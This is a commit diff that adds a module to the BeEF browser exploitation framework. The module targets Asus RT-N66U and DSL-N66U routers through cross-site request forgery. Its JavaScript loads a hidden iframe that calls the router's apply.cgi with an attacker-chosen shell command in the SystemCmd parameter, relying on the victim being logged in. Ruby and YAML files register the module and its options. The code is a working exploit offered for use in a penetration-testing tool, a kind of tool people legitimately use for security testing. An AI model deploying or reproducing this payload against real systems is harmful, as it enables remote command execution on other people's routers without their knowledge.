Merge pull request #975 from kxynos/master

Added support for Asus RT-N66U and DSL-N66U Command Execution via CSRF
2014-03-06 17:32:09 +00:00
parent 8f4f51874d 25550f9cfa
commit 161729bba5
3 changed files with 61 additions and 0 deletions
--- a/modules/exploits/router/asus_rt_n66u_cmd_exec/command.js
+++ b/modules/exploits/router/asus_rt_n66u_cmd_exec/command.js
@@ -0,0 +1,27 @@
+//
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var gateway  = '<%= @base %>'; 
+	var exec_command = '<%= @exec_command %>';
+	var timeout  = 15;
+
+	var asus_rt_n66u_iframe1_<%= @command_id %> = beef.dom.createInvisibleIframe();
+	
+	asus_rt_n66u_iframe1_<%= @command_id %>.setAttribute('src',"http://" + gateway +"/apply.cgi?current_page=Main_Netstat_Content.asp&next_page=Main_Netstat_Content.asp&next_host="+gateway+"&group_id=&modified=0&action_mode=+Refresh+&action_script=&action_wait=&first_time=&preferred_lang=EN&SystemCmd="+exec_command+"&firmver=3.0.0.4&cmdMethod=netstat&NetOption=-a&targetip=&ExtOption=-r+state");
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+    
+	cleanup = function() {
+		document.body.removeChild(asus_rt_n66u_iframe1_<%= @command_id %>);
+
+	}
+	setTimeout("cleanup()", timeout*1000);
+
+});
+
--- a/modules/exploits/router/asus_rt_n66u_cmd_exec/config.yaml
+++ b/modules/exploits/router/asus_rt_n66u_cmd_exec/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        asus_rt_n66u_cmd_exec:
+            enable: true
+            category: ["Exploits", "Router"]
+            name: "Asus DSL-N66U / RT-N66U cmd exec"
+            description: "Attempts to inject a command against routers Asus RT-N66U / Asus DSL-N66U via CSRF.(Assumes user has logged on)"
+            authors: ["kxynos", "n0x00"]
+            target:
+                working: ["ALL"]
--- a/modules/exploits/router/asus_rt_n66u_cmd_exec/module.rb
+++ b/modules/exploits/router/asus_rt_n66u_cmd_exec/module.rb
@@ -0,0 +1,19 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Asus_rt_n66u_cmd_exec < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{'name' => 'base', 'ui_label' => 'Router web root', 'value' => '192.168.100.1'},
+			{'name' => 'exec_command', 'ui_label' => 'Command to issue', 'value' => ''}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end